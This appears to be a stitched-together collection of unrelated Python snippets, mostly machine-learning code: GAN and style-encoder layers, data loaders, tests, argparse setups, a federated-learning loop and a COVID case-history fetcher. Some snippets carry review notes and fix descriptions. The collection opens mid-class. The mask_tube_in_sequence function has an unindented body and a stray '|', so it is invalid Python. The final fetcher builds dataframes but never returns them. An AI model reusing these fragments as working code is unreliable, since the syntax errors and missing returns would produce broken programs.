        acti = get_nonlinearity_layer(activation_type=act)
        # Encoder: four downsampling blocks followed by two residual decoders.
        self.block0 = EncoderBlock(input_nc, (ngf * 2), norm_layer, acti, use_spect)
        self.block1 = EncoderBlock((ngf * 2), (ngf * 4), norm_layer, acti, use_spect)
        self.block2 = EncoderBlock((ngf * 4), (ngf * 4), norm_layer, acti, use_spect)
        self.block3 = EncoderBlock((ngf * 4), (ngf * 4), norm_layer, acti, use_spect)
        self.block4 = ResBlockDecoder((ngf * 4), (ngf * 4), (ngf * 4), norm_layer, acti, use_spect)
        self.block5 = ResBlockDecoder((ngf * 4), (ngf * 4), (ngf * 4), norm_layer, acti, use_spect)
        # NOTE(review): self.down is defined but not used in forward().
        self.down = nn.Upsample(scale_factor=0.25, mode='nearest')
        # 1x1 conv + tanh producing the per-pixel style code map.
        self.get_code = nn.Sequential(nn.Conv2d(256, 256, kernel_size=1, padding=0), nn.Tanh())

    def forward(self, input, seg):
        """Return (codes_vector, exist_vector, features).

        codes_vector: (B, num_seg_classes + 1, C) — mean style code per
            segmentation class; the last slot holds the global mean code.
        exist_vector: (B, num_seg_classes) — 1 where the class has any pixels.
        features: the encoded feature map the codes were pooled from.
        """
        out = self.block0(input)
        out = self.block3(self.block2(self.block1(out)))
        out = self.block5(self.block4(out))
        codes = self.get_code(out)
        # Resize the segmentation to the code map's spatial resolution.
        segmap = F.interpolate(seg, size=codes.size()[2:], mode='nearest')
        bs = codes.shape[0]
        # NOTE(review): hs/ws are computed but unused below.
        hs = codes.shape[2]
        ws = codes.shape[3]
        cs = codes.shape[1]
        f_size = cs
        s_size = segmap.shape[1]
        # One extra slot at index s_size for the global (whole-map) code.
        codes_vector = torch.zeros((bs, (s_size + 1), cs), dtype=codes.dtype, device=codes.device)
        exist_vector = torch.zeros((bs, s_size), dtype=codes.dtype, device=codes.device)
        for i in range(bs):
            for j in range(s_size):
                # Pool the mean feature over the pixels of class j (if any).
                component_mask_area = torch.sum(segmap.bool()[(i, j)])
                if (component_mask_area > 0):
                    codes_component_feature = codes[i].masked_select(segmap.bool()[(i, j)]).reshape(f_size, component_mask_area).mean(1)
                    codes_vector[i][j] = codes_component_feature
                    exist_vector[i][j] = 1
            # Global code: channel-wise mean over the whole code map.
            (tmpmean, tmpstd) = calc_mean_std(codes[i].reshape(1, codes[i].shape[0], codes[i].shape[1], codes[i].shape[2]))
            codes_vector[i][s_size] = tmpmean.squeeze()
        return (codes_vector, exist_vector, out)
def _HamiltonianCarrying(q, p, g, s):
    """Integrate (q, p, g) with 10 explicit Euler steps of size 0.1 under the
    Hamiltonian flow H(q, p; s), carrying g along via the metric term _k.

    Fix: the original g-update read ``(0.1 * _k(g, q, s)) p`` — a syntax error
    with the multiplication operator between the metric term and ``p`` missing.
    """
    dt = 0.1  # fixed Euler step size
    for _ in range(10):
        (q, p, g) = (
            q + dt * _dp_Hqp(q, p, s),   # dq/dt =  dH/dp
            p - dt * _dq_Hqp(q, p, s),   # dp/dt = -dH/dq
            # assumes the intended update is g += dt * k(g, q, s) * p — TODO confirm
            g + dt * _k(g, q, s) * p,
        )
    return (q, p, g)
def write_demo(fn, data, names, bpm=90.0, shift_second=None, shift_beat=None):
    """Convert demo data to a MIDI object and write it to file *fn*."""
    midi_obj = demo_to_midi(data, names, bpm, shift_second, shift_beat)
    midi_obj.write(fn)
class DenseBlock(nn.Module):
    """Fully-connected layer with optional equalized learning rate (wscale)
    and learning-rate multiplier, as used in StyleGAN-style networks.

    With ``use_wscale`` the weight is stored at unit scale and multiplied by a
    runtime constant, so all weights receive gradients of comparable magnitude.
    """

    def __init__(self, in_channels, out_channels, add_bias=True, use_wscale=True, wscale_gain=_WSCALE_GAIN, lr_mul=1.0, activation_type='lrelu'):
        super().__init__()
        shape = (out_channels, in_channels)
        fan_in_scale = wscale_gain / np.sqrt(in_channels)
        if use_wscale:
            # Store unit-variance weights; apply the fan-in scale at runtime.
            self.weight = nn.Parameter(torch.randn(*shape) / lr_mul)
            self.wscale = fan_in_scale * lr_mul
        else:
            # Bake the fan-in scale into the stored weights instead.
            self.weight = nn.Parameter(torch.randn(*shape) * fan_in_scale / lr_mul)
            self.wscale = lr_mul
        self.bias = nn.Parameter(torch.zeros(out_channels)) if add_bias else None
        self.bscale = lr_mul
        if activation_type == 'linear':
            self.activate = nn.Identity()
            self.activate_scale = 1.0
        elif activation_type == 'lrelu':
            self.activate = nn.LeakyReLU(negative_slope=0.2, inplace=True)
            # sqrt(2) keeps the output variance roughly unchanged after LeakyReLU.
            self.activate_scale = np.sqrt(2.0)
        else:
            raise NotImplementedError(f'Not implemented activation function: `{activation_type}`!')

    def forward(self, x):
        # Flatten anything that is not already (batch, features).
        if x.ndim != 2:
            x = x.view(x.shape[0], -1)
        bias = self.bias * self.bscale if self.bias is not None else None
        out = F.linear(x, weight=self.weight * self.wscale, bias=bias)
        return self.activate(out) * self.activate_scale
def test_digits_cosine_greedi_ln_object():
    """GraphCut selection with a lazy/naive GreeDi optimizer object must
    reproduce the frozen ranking, gains, and subset on the digits data."""
    optimizer = GreeDi(optimizer1='lazy', optimizer2='naive', random_state=0)
    selector = GraphCutSelection(100, 'cosine', optimizer=optimizer)
    selector.fit(X_digits)
    assert_array_equal(selector.ranking, digits_cosine_greedi_ranking)
    assert_array_almost_equal(selector.gains, digits_cosine_greedi_gains, 4)
    assert_array_almost_equal(selector.subset, X_digits[selector.ranking])
def select_skeleton(coords_src, joint_info_src, skeleton_type_dst):
    """Select/reorder joints of *coords_src* to match a destination skeleton.

    Fixes:
    - The lookup checked for ``name_<skeleton_type_dst>`` but then indexed the
      hardcoded ``name_h36m`` suffix; the destination suffix is now used
      consistently.
    - ``torch.gather`` was called with a plain Python list (a TypeError) and
      would in any case need an index broadcast to the full tensor shape;
      ``torch.index_select`` along the joint axis is the intended operation.

    Args:
        coords_src: tensor of joint coordinates with joints on dim -2.
        joint_info_src: source joint metadata with a ``names`` list.
        skeleton_type_dst: destination skeleton name; '' returns the input.
    """
    if skeleton_type_dst == '':
        return coords_src

    def get_index(name):
        # Prefer the joint variant suffixed with the destination skeleton type,
        # fall back to the bare joint name.
        suffixed = f'{name}_{skeleton_type_dst}'
        if suffixed in joint_info_src.names:
            return joint_info_src.names.index(suffixed)
        return joint_info_src.names.index(name)

    joint_info_dst = ds3d.get_joint_info(skeleton_type_dst)
    selected = torch.tensor(
        [get_index(name) for name in joint_info_dst.names],
        dtype=torch.long, device=coords_src.device)
    # Pick whole joints along the joint axis (dim=-2).
    return torch.index_select(coords_src, -2, selected)
def mask_tube_in_sequence(mask_ratio: float, tube_size: int, len_sequence: int, device: (str | torch.device)='cpu'):
num_masked = floor((len_sequence * mask_ratio))
indices_permuted = ((torch.randperm((len_sequence // tube_size), device=device) * tube_size).repeat_interleave(tube_size) + torch.arange(tube_size, device=device).repeat((len_sequence // tube_size)))
indices_not_kept: torch.Tensor = indices_permuted[:num_masked].sort()[0]
indices_kept: torch.Tensor = indices_permuted[num_masked:].sort()[0]
indices = torch.cat((indices_not_kept, indices_kept))
inversed_temporal_masked_indices = torch.argsort(indices)
return (indices_not_kept, indices_kept, inversed_temporal_masked_indices, num_masked) |
def _ensure_csv_header(path, header_row):
    """Create *path* with a single CSV header row if it does not exist yet."""
    if not os.path.exists(path):
        with open(path, 'w+') as out:
            csv.writer(out).writerow(header_row)

def main(config, args):
    """Entry point: seed RNGs, build the TextSR mission, then test or train.

    Improvements: the duplicated checkpoint-dir creation and CSV-header
    bootstrap were factored into ``_ensure_csv_header``; ``os.mkdir`` was
    replaced with ``os.makedirs(exist_ok=True)`` so missing parent
    directories no longer crash startup.
    """
    set_seed(config.TRAIN.manualSeed)
    mission = TextSR(config, args)
    os.makedirs(config.TRAIN.ckpt_dir, exist_ok=True)
    if args.test:
        _ensure_csv_header(
            os.path.join(config.TRAIN.ckpt_dir, 'test_result.csv'),
            ['recognizer', 'subset', 'accuracy', 'psnr', 'ssim'])
        mission.test()
    else:
        _ensure_csv_header(
            os.path.join(config.TRAIN.ckpt_dir, 'log.csv'),
            ['epoch', 'dataset', 'accuracy', 'psnr_avg', 'ssim_avg', 'best', 'best_sum'])
        mission.train()
class SquadDataTrainingArguments():
    """Arguments controlling SQuAD data loading and feature conversion.

    NOTE(review): the fields use ``dataclasses.field`` defaults, so this class
    is presumably decorated with ``@dataclass`` at its definition site —
    confirm the decorator is present, otherwise the defaults are Field objects.
    NOTE(review): the help text of ``n_best_size`` appears copy-pasted from
    ``null_score_diff_threshold`` and likely should describe the number of
    n-best predictions instead.
    """
    # Model architecture key (one of MODEL_TYPES).
    model_type: str = field(default=None, metadata={'help': ('Model type selected in the list: ' + ', '.join(MODEL_TYPES))})
    # Directory containing the SQuAD .json files.
    data_dir: str = field(default=None, metadata={'help': 'The input data dir. Should contain the .json files for the SQuAD task.'})
    # Hard cap on tokenized input length (truncate/pad to this).
    max_seq_length: int = field(default=128, metadata={'help': 'The maximum total input sequence length after tokenization. Sequences longer than this will be truncated, sequences shorter will be padded.'})
    # Overlap stride when chunking long documents.
    doc_stride: int = field(default=128, metadata={'help': 'When splitting up a long document into chunks, how much stride to take between chunks.'})
    # Question token budget.
    max_query_length: int = field(default=64, metadata={'help': 'The maximum number of tokens for the question. Questions longer than this will be truncated to this length.'})
    # Answer-span length cap (start/end predicted independently).
    max_answer_length: int = field(default=30, metadata={'help': 'The maximum length of an answer that can be generated. This is needed because the start and end predictions are not conditioned on one another.'})
    overwrite_cache: bool = field(default=False, metadata={'help': 'Overwrite the cached training and evaluation sets'})
    # SQuAD v2: allow unanswerable questions.
    version_2_with_negative: bool = field(default=False, metadata={'help': 'If true, the SQuAD examples contain some that do not have an answer.'})
    null_score_diff_threshold: float = field(default=0.0, metadata={'help': 'If null_score - best_non_null is greater than the threshold predict null.'})
    n_best_size: int = field(default=20, metadata={'help': 'If null_score - best_non_null is greater than the threshold predict null.'})
    # Language id for language-specific XLM variants.
    lang_id: int = field(default=0, metadata={'help': 'language id of input for language-specific xlm models (see tokenization_xlm.PRETRAINED_INIT_CONFIGURATION)'})
    threads: int = field(default=1, metadata={'help': 'multiple threads for converting example to features'})
def parse_synthesize_args():
    """Build and parse the command-line arguments for Wolf synthesis.

    Returns the parsed ``argparse.Namespace``.
    """
    parser = ArgumentParser(description='Wolf Synthesize')
    # What to do and how to seed it.
    parser.add_argument('--mode',
                        choices=['sample', 'reconstruct', 'interpolate', 'switch', 'classify'],
                        help='synthesis mode', required=True)
    parser.add_argument('--seed', type=int, default=None, metavar='S',
                        help='random seed')
    # Data selection.
    parser.add_argument('--dataset',
                        choices=['cifar10', 'lsun', 'imagenet', 'celeba'],
                        help='data set', required=True)
    parser.add_argument('--category',
                        choices=[None, 'bedroom', 'tower', 'church_outdoor'],
                        help='category', default=None)
    parser.add_argument('--image_size', type=int, required=True, metavar='N',
                        help='input image size')
    parser.add_argument('--workers', default=4, type=int, metavar='N',
                        help='number of data loading workers (default: 4)')
    parser.add_argument('--n_bits', type=int, default=8, metavar='N',
                        help='number of bits per pixel.')
    # Paths.
    parser.add_argument('--model_path', help='path for saving model file.', required=True)
    parser.add_argument('--data_path', help='path for data file.', required=True)
    # Sampling behavior.
    parser.add_argument('--tau', type=float, default=1.0, metavar='S',
                        help='temperature for iw decoding (default: 1.0)')
    parser.add_argument('--nsamples', type=int, default=256, metavar='N',
                        help='number of samples.')
    parser.add_argument('--make_grid', action='store_true',
                        help='make grid of image')
    parser.add_argument('--probe',
                        choices=['svm-linear', 'svm-rbf', 'logistic'],
                        default=None, help='classifier for probe')
    return parser.parse_args()
def get_config():
    """Return the default hyperparameter ConfigDict for this agent."""
    settings = {
        'actor_lr': 0.0003,
        'value_lr': 0.0003,
        'critic_lr': 0.0003,
        'hidden_dims': (256, 256),
        'discount': 0.99,
        'expectile': 0.7,      # expectile-regression parameter
        'temperature': 0.5,    # advantage-weighting temperature
        'dropout_rate': 0.1,
        'tau': 0.005,          # target-network soft-update rate
    }
    config = ml_collections.ConfigDict()
    for key, value in settings.items():
        setattr(config, key, value)
    return config
def indice_conv_backward(features, filters, out_bp, indice_pairs, indice_pair_num, inverse=False, subm=False):
    """Dispatch the sparse-convolution backward kernel by filter dtype.

    Raises:
        NotImplementedError: for dtypes other than float32 / float16.
    """
    if filters.dtype == torch.float32:
        kernel = sparse_conv_ext.indice_conv_backward_fp32
    elif filters.dtype == torch.half:
        kernel = sparse_conv_ext.indice_conv_backward_half
    else:
        raise NotImplementedError
    return kernel(features, filters, out_bp, indice_pairs, indice_pair_num, int(inverse), int(subm))
def generate_threats():
    """Emit the threats-to-validity table: correct-fix counts after removing
    bugs whose developer fixes overlap the CodeT5 training data (union of the
    Defects4J v1 and v2 overlapping-bug sets)."""
    generate_fixes_table('Number of correct fixes by removing bugs with overlapping developer fixes in the CodeT5 training data', ALL_FIXES, (D4J1_OVERLAPPING_BUGS | D4J2_OVERLAPPING_BUGS))
def save_model(iter_, model_dir, filename, model, optimizer):
    """Persist a training checkpoint (iteration counter, model and optimizer
    state dicts) to ``model_dir/filename``."""
    checkpoint = {
        'iteration': iter_,
        'model_state_dict': model.state_dict(),
        'optimizer_state_dict': optimizer.state_dict(),
    }
    torch.save(checkpoint, os.path.join(model_dir, filename))
def plot_roc(tpr_list, fpr_list, attack_name):
    """Plot an ROC curve for *attack_name*, save it as
    ``{attack_name}_ROC_Curve`` and display it."""
    plt.figure(figsize=(10, 6))
    plt.plot(fpr_list, tpr_list, '-', label=attack_name)
    plt.xlabel('False Positive Rate')
    plt.ylabel('True Positive Rate')
    plt.title(f'ROC_{attack_name}_Attack')
    plt.legend(loc=4)  # lower-right corner
    plt.grid()
    plt.savefig(f'{attack_name}_ROC_Curve', bbox_inches='tight')
    plt.show()
def test_glorot_1d_not_supported():
    """GlorotNormal needs at least two dimensions; a 1-D shape must raise."""
    from lasagne.init import GlorotNormal
    init = GlorotNormal()
    with pytest.raises(RuntimeError):
        init.sample((100,))
def cat_desc_to_id(cat_desc):
    """Map a category description — or a list/tuple of them — to numeric id(s).

    A sequence input yields a tuple of ids; a single description yields one id.
    """
    if not isinstance(cat_desc, (list, tuple)):
        return _cat_ids[cat_desc]
    return tuple(_cat_ids[desc] for desc in cat_desc)
def set_empty_labels(doc):
    """Attach all-zero per-sentence label lists to *doc* and return it.

    Bug fix: the original assigned the SAME list object to both extension
    attributes, so mutating ``doc._.Labels`` silently mutated
    ``doc._.CLPR_Labels`` as well. Each attribute now gets its own list.
    """
    num_sents = len(list(doc.sents))
    doc._.Labels = [0] * num_sents
    doc._.CLPR_Labels = [0] * num_sents
    return doc
class HDFShardDataset(Dataset):
    """Dataset over a directory of HDF5 shard files.

    Item *idx* opens the owning shard and returns, for every key in that
    shard, the slice of ``stride`` consecutive rows starting at
    ``idx * stride``.

    NOTE(review): indexing assumes every shard except possibly the last has
    the same row count as the first shard — confirm when producing shards.
    """
    def __init__(self, shard_dir, shard_names=None, primary_key=None, stride=1):
        super().__init__()
        self.shard_dir = shard_dir
        self.shard_names = shard_names
        # Default: every file in the directory, in sorted (shard) order.
        if (not shard_names):
            self.shard_names = sorted(os.listdir(shard_dir))
        # Key used only to measure per-shard row counts.
        self.primary_key = self.__primary_key(primary_key)
        self.stride = stride
        (self.shard_len, self.dataset_len) = self.__shard_len_dataset_len()
    def __len__(self):
        return self.dataset_len
    def __getitem__(self, idx):
        # Locate the shard that owns this index, then the offset inside it.
        shard_num = (idx // self.shard_len)
        idx -= (shard_num * self.shard_len)
        nth_shard = h5py.File(os.path.join(self.shard_dir, self.shard_names[shard_num]), 'r')
        keys = list(nth_shard.keys())
        item = {}
        for key in keys:
            # A window of `stride` consecutive rows per key.
            item[key] = nth_shard[key][(idx * self.stride):((idx + 1) * self.stride)]
        nth_shard.close()
        return item
    def __primary_key(self, primary_key):
        # Fall back to the first key found in the first shard.
        first_shard = h5py.File(os.path.join(self.shard_dir, self.shard_names[0]), 'r')
        if (not primary_key):
            primary_key = list(first_shard.keys())[0]
        first_shard.close()
        return primary_key
    def __shard_len_dataset_len(self):
        # Measure the first shard (regular length) and the last (may be short).
        first_shard = h5py.File(os.path.join(self.shard_dir, self.shard_names[0]), 'r')
        last_shard = h5py.File(os.path.join(self.shard_dir, self.shard_names[(- 1)]), 'r')
        rows_per_shard = len(first_shard[self.primary_key])
        rows_per_last_shard = len(last_shard[self.primary_key])
        # Full shards contribute rows/stride items each; the last contributes
        # its own (possibly smaller) count.
        dataset_len = ((rows_per_shard * (len(self.shard_names) - 1)) // self.stride)
        dataset_len += (rows_per_last_shard // self.stride)
        shard_len = (rows_per_shard // self.stride)
        first_shard.close()
        last_shard.close()
        return (shard_len, dataset_len)
class ReinitFL():
    """Federated-learning driver: runs `max_round` rounds of client training,
    server aggregation, and state/mask redistribution."""

    def __init__(self, config, server, client_list):
        self.max_round = config.MAX_ROUND
        self.server = server
        self.client_list = client_list
        # Per-round metrics the server appends to.
        self.list_loss = []
        self.list_acc = []
        self.list_est_time = []
        self.list_model_size = []

    def main(self):
        start = timer()
        for round_idx in range(self.max_round):
            state_dicts = []
            sample_counts = []
            client_lrs = []
            # Local training on every client.
            for client in self.client_list:
                sd, n_samples, lr = client.main()
                state_dicts.append(sd)
                sample_counts.append(n_samples)
                client_lrs.append(lr)
            # All clients must have stepped their schedulers identically.
            last_lr = client_lrs[0]
            assert all(lr == last_lr for lr in client_lrs[1:])
            # Server aggregates and returns pruning masks + fresh state dicts.
            list_mask, new_state_dicts = self.server.main(
                round_idx, state_dicts, sample_counts, last_lr, start,
                self.list_loss, self.list_acc, self.list_est_time, self.list_model_size)
            for client, new_sd in zip(self.client_list, new_state_dicts):
                client.load_state_dict(new_sd)
                client.load_mask(list_mask)
def randint(low: IntNumType, high: Optional[IntNumType]=None, size: Optional[Size]=None, dtype: Type=np.int32, random_state: Optional[np.random.RandomState]=None) -> Any:
    """Draw random integers like ``RandomState.randint``, falling back to the
    module-level RNG when no ``random_state`` is supplied."""
    rng = random_state if random_state is not None else get_random_state()
    return rng.randint(low, high, size, dtype)
def test_mildnonaxi_sigmat2_direct():
    """sigmaT2 of an evolved disk DF in an axisymmetric (logarithmic halo)
    potential, evaluated directly (grid=False), must match the initial
    Dehnen DF's sigmaT2 to within 0.025 in log."""
    idf = dehnendf(beta=0.0)
    pot = [LogarithmicHaloPotential(normalize=1.0)]
    # Evolve backwards from t=-10 so the DF should remain the initial one.
    edf = evolveddiskdf(idf, pot=pot, to=(- 10.0))
    st2 = edf.sigmaT2(0.9, phi=0.2, integrate_method='rk6_c', grid=False)
    ist2 = idf.sigmaT2(0.9)
    assert (numpy.fabs((numpy.log(st2) - numpy.log(ist2))) < 0.025), 'sigmat2 of evolveddiskdf for axisymmetric potential is not equal to that of initial DF when calculated directly'
    return None
class ConvLayer(nn.Module):
    """Conv2d (no bias) -> InstanceNorm or BatchNorm -> ReLU block."""

    def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0, groups=1, IN=False):
        super(ConvLayer, self).__init__()
        self.conv = nn.Conv2d(in_channels, out_channels, kernel_size,
                              stride=stride, padding=padding, bias=False, groups=groups)
        # InstanceNorm with learnable affine params, or plain BatchNorm.
        self.bn = nn.InstanceNorm2d(out_channels, affine=True) if IN else nn.BatchNorm2d(out_channels)
        self.relu = nn.ReLU()

    def forward(self, x):
        return self.relu(self.bn(self.conv(x)))
def filter_data(df, header, restraints=None):
    """Keep only rows whose restrained columns hold allowed values.

    Args:
        df: iterable of rows; each row's LAST element is an indexable record.
        header: mapping from column name to index within that record.
        restraints: mapping column name -> collection of allowed values.
            Defaults to no restraints (everything passes).

    Fixes: the mutable default argument ``restraints={}`` was replaced with
    the ``None`` sentinel; the scan now short-circuits on the first failed
    restraint instead of evaluating all of them.
    """
    if restraints is None:
        restraints = {}
    filtered = []
    for row in df:
        record = row[-1]
        keep = True
        for column, allowed in restraints.items():
            if record[header[column]] not in allowed:
                keep = False
                break  # one failed restraint rejects the row
        if keep:
            filtered.append(row)
    return filtered
def on_draw():
    """Render one frame: clear, FPS counter, static physics segments, the
    sprite batch, and red outlines of each logo's collision shape."""
    window.clear()
    fps_display.draw()
    # Static physics segments as grey GL line pairs.
    for segment in static_lines:
        body = segment.body
        end_a = body.position + segment.a.rotated(body.angle)
        end_b = body.position + segment.b.rotated(body.angle)
        pyglet.graphics.draw(2, pyglet.gl.GL_LINES,
                             ('v2f', (end_a.x, end_a.y, end_b.x, end_b.y)),
                             ('c3f', ((0.8, 0.8, 0.8) * 2)))
    batch.draw()
    # Red outline around every logo's collision polygon.
    for sprite in logos:
        verts = sprite.shape.get_vertices()
        count = len(verts)
        flat = [coord for vert in verts for coord in vert]
        pyglet.graphics.draw(count, pyglet.gl.GL_LINE_LOOP,
                             ('v2f', flat),
                             ('c3f', ((1, 0, 0) * count)))
def normal_entropy(std):
    """Entropy of independent Gaussians with the given standard deviations.

    Per dimension the entropy is 0.5 * log(2*pi*var) + 0.5; dimensions are
    summed over axis 1, keeping that axis with size 1.
    """
    variance = std.pow(2)
    per_dim = 0.5 * torch.log(2 * math.pi * variance) + 0.5
    return per_dim.sum(1, keepdim=True)
def main():
    """Split a blank-line-delimited document file into N shard files.

    Documents (runs of non-blank lines) are distributed round-robin to
    ``<input>.shard0 .. <input>.shard{N-1}``, separated by single blank lines
    inside each shard.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('input')
    parser.add_argument('--num-shards', type=int)
    args = parser.parse_args()
    assert ((args.num_shards is not None) and (args.num_shards > 1))
    with open(args.input, 'r', encoding='utf-8') as src:
        with contextlib.ExitStack() as stack:
            shards = [
                stack.enter_context(open(args.input + '.shard' + str(i), 'w', encoding='utf-8'))
                for i in range(args.num_shards)
            ]
            pending = []
            wrote_doc = [False] * args.num_shards

            def flush(i):
                # Blank line between documents within a shard (not before the first).
                if wrote_doc[i]:
                    shards[i].write('\n')
                wrote_doc[i] = True
                for ln in pending:
                    shards[i].write(ln)
                pending.clear()

            doc_count = 0
            for ln in src:
                if ln.strip() == '':
                    flush(doc_count % args.num_shards)
                    doc_count += 1
                else:
                    pending.append(ln)
            # Final (possibly unterminated) document.
            flush(doc_count % args.num_shards)
def main():
    """Load a .sens file and export the streams selected via ``opt`` flags
    (depth images, color images, poses, camera intrinsics)."""
    if not os.path.exists(opt.output_path):
        os.makedirs(opt.output_path)
    sys.stdout.write('loading %s...' % opt.filename)
    sensor_data = SensorData(opt.filename)
    sys.stdout.write('loaded!\n')

    def out_dir(sub):
        return os.path.join(opt.output_path, sub)

    if opt.export_depth_images:
        sensor_data.export_depth_images(out_dir('depth'))
    if opt.export_color_images:
        sensor_data.export_color_images(out_dir('color'))
    if opt.export_poses:
        sensor_data.export_poses(out_dir('pose'))
    if opt.export_intrinsics:
        sensor_data.export_intrinsics(out_dir('intrinsic'))
def get_parsed_sent(xml_file, sent_num, map, nlp):
    """Build a CoNLL-U fragment for sentence *sent_num* of a KAF/NAF XML file.

    Tokens and terms are read from the XML; dependency heads/relations come
    from running the (stanza-like) *nlp* pipeline on the reconstructed
    sentence text. *map* maps language-specific POS tags to UPOS.

    NOTE(review): in the output columns, `tag` receives the original POS tag
    and `pos` the mapped UPOS because the stored (lemma, pos, upos) triple is
    unpacked as (lemma, tag, pos) below — confirm this ordering is intended.
    """
    catalan = False
    conllu = ''
    mark_xml = open(xml_file).read().encode('utf8')
    base_root = fromstring(mark_xml, xmlparser)
    tokens = {}
    sents = {}
    terms = {}
    for annotation in base_root:
        if (annotation.tag == 'text'):
            for token in annotation:
                token_idx = token.get('id')
                if (token_idx is None):
                    # Catalan corpora use 'wid' instead of 'id' for word tokens.
                    catalan = True
                    token_idx = token.get('wid')
                tok = token.text
                sent = token.get('sent')
                tokens[token_idx] = tok
                sents[token_idx] = sent
        if (annotation.tag == 'terms'):
            for term in annotation:
                if (term.tag == 'term'):
                    idx = term.get('id')
                    if (idx is None):
                        idx = term.get('tid')
                    # Rewrite term ids ('t...') to word ids ('w...') so they key
                    # into `tokens`. NOTE(review): replace() swaps EVERY 't' —
                    # assumes ids contain no other 't' characters; confirm format.
                    idx = idx.replace('t', 'w')
                    lemma = term.get('lemma')
                    if catalan:
                        pos = term.get('pos')
                    else:
                        pos = term.get('morphofeat')
                    upos = map_to_upos(pos, map)
                    terms[idx] = (lemma, pos, upos)
    # Group token ids by sentence, then pick the requested sentence.
    sentidx2tokenidx = get_sents(sents)
    token_idxs = sentidx2tokenidx[str(sent_num)]
    text = ' '.join([tokens[i] for i in token_idxs])
    processed = nlp(text)
    # Dependency head + relation per word from the parser's first sentence.
    deps = [(t.head, t.deprel) for t in processed.sentences[0].words]
    for (i, tokenidx) in enumerate(token_idxs):
        token = tokens[tokenidx]
        (lemma, tag, pos) = terms[tokenidx]
        (head, deprel) = deps[i]
        # Columns: ID FORM LEMMA UPOS XPOS _ HEAD DEPREL _ _
        conllu += '{}\t{}\t{}\t{}\t{}\t_\t{}\t{}\t_\t_\n'.format((i + 1), token, lemma, pos, tag, head, deprel)
    return conllu
def test_cif_realnvp_config():
    """The MNIST RealNVP CIF (non-baseline) config must match this frozen
    snapshot exactly."""
    expected = {
        'schema_type': 'multiscale-realnvp',
        'use_cond_affine': True,
        'pure_cond_affine': False,
        'g_hidden_channels': [64, 64, 64, 64],
        'num_u_channels': 1,
        'st_nets': [8, 8],
        'p_nets': [64, 64],
        'q_nets': [64, 64],
        'early_stopping': True,
        'train_batch_size': 100,
        'valid_batch_size': 500,
        'test_batch_size': 500,
        'opt': 'adam',
        'lr': 0.0001,
        'weight_decay': 0.0,
        'logit_tf_lambda': 1e-06,
        'logit_tf_scale': 256,
        'dequantize': True,
        'act_norm': False,
        'batch_norm': True,
        'batch_norm_apply_affine': False,
        'batch_norm_use_running_averages': True,
        'batch_norm_momentum': 0.1,
        'lr_schedule': 'none',
        'max_bad_valid_epochs': 50,
        'max_grad_norm': None,
        'max_epochs': 1000,
        'epochs_per_test': 1,
        'train_objective': 'iwae',
        'num_train_importance_samples': 1,
        'num_valid_importance_samples': 5,
        'num_test_importance_samples': 10,
    }
    actual = get_config(dataset='mnist', model='realnvp', use_baseline=False)
    assert expected == actual
def fetch_history_for_many_ags(ags_list):
    """Fetch the RKI case/death history for several Landkreise (AGS codes)
    from the ArcGIS query endpoint and return one DataFrame per AGS.

    The request is retried up to 10 times on transport errors or unexpected
    payloads. Returns a dict mapping AGS (int) -> DataFrame indexed by
    Meldedatum (ISO-8601, UTC-shifted) with columns `<ags>` (cases) and
    `<ags>_deaths`.
    """
    AG_RKI_SUMS_QUERY_BASE_URL = os.environ['AG_RKI_SUMS_QUERY_BASE_URL']
    # Short aliases for the ArcGIS field names used in the WHERE clause.
    md = 'Meldedatum'
    ts = 'timestamp'
    idlk = 'IdLandkreis'
    t_start = '2020-05-01 22:00:00'
    d_end = (datetime.today() - timedelta(days=0))
    t_end = f"{d_end.strftime('%Y-%m-%d')} 23:59:59"
    # AGS codes are zero-padded to 5 digits on the server side.
    ags_padded_list = [str(ags).zfill(5) for ags in ags_list]
    ags_padded_list_cs = ', '.join((f"'{a}'" for a in ags_padded_list))
    where_clause = f"({md}>{ts} '{t_start}') AND ({md}<{ts} '{t_end}') AND ({idlk} IN ({ags_padded_list_cs}))"
    record_count_limit = (52 * (10 ** 4))
    paramdict = {'where': where_clause, 'returnGeometry': 'false', 'outFields': '*', 'orderByFields': 'Meldedatum asc', 'resultOffset': 0, 'resultRecordCount': record_count_limit, 'f': 'json'}
    params = urllib.parse.urlencode(paramdict)
    url = f'{AG_RKI_SUMS_QUERY_BASE_URL}{params}'
    log.info('Query for history for these AGSs: %s', ags_list)
    log.info('query params:%s', json.dumps(paramdict, indent=2))
    # Retry loop: transport errors and payloads without 'features' are retried.
    attempt = 0
    while True:
        attempt += 1
        if (attempt >= 10):
            sys.exit('too many attempts, stop retrying')
        try:
            resp = requests.get(url, headers={'user-agent': 'Mozilla/5.0 (X11; Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'}, timeout=(3.05, 75))
            resp.raise_for_status()
        except requests.exceptions.RequestException as err:
            log.info('request error (attempt %s): %s', attempt, err)
            log.info('retry soon')
            time.sleep(15)
            continue
        log.info('Got OK response, parse through data')
        data = resp.json()
        if ('features' in data):
            log.info('response looks good')
            break
        log.info('unexpected data (attempt %s) -- retry soon:\n%s', attempt, json.dumps(data, indent=2))
        time.sleep(15)
    log.info('response contains %s feature objects', len(data['features']))
    # Warn when nearing the server-side record cap (results would be truncated).
    if (len(data['features']) > (0.6 * record_count_limit)):
        log.warning('that is close to %s', record_count_limit)
    data_by_ags = {}
    for ags in ags_list:
        data_by_ags[ags] = {'timestrings': [], 'cases': [], 'deaths': []}
    for obj in (o['attributes'] for o in data['features']):
        # Meldedatum arrives as epoch milliseconds; localize then convert to UTC.
        md_aware_loc = datetime.fromtimestamp(int((obj['Meldedatum'] / 1000.0)), tz=pytz.timezone('Europe/Amsterdam'))
        md_aware_utc = md_aware_loc.astimezone(pytz.utc)
        # NOTE(review): +17h presumably aligns timestamps with the RKI daily
        # publication time — confirm against downstream consumers.
        md_aware_utc = (md_aware_utc + timedelta(hours=17))
        ags = int(obj['IdLandkreis'])
        data_by_ags[ags]['timestrings'].append(md_aware_utc.isoformat())
        data_by_ags[ags]['cases'].append(obj['SummeFall'])
        data_by_ags[ags]['deaths'].append(obj['SummeTodesfall'])
    # One time-indexed DataFrame per AGS.
    dataframes = {}
    for (ags, data) in data_by_ags.items():
        df = pd.DataFrame(data={ags: data['cases'], f'{ags}_deaths': data['deaths']}, index=data['timestrings'])
        df.index = pd.to_datetime(df.index)
        df.index.name = 'time_iso8601'
        dataframes[ags] = df
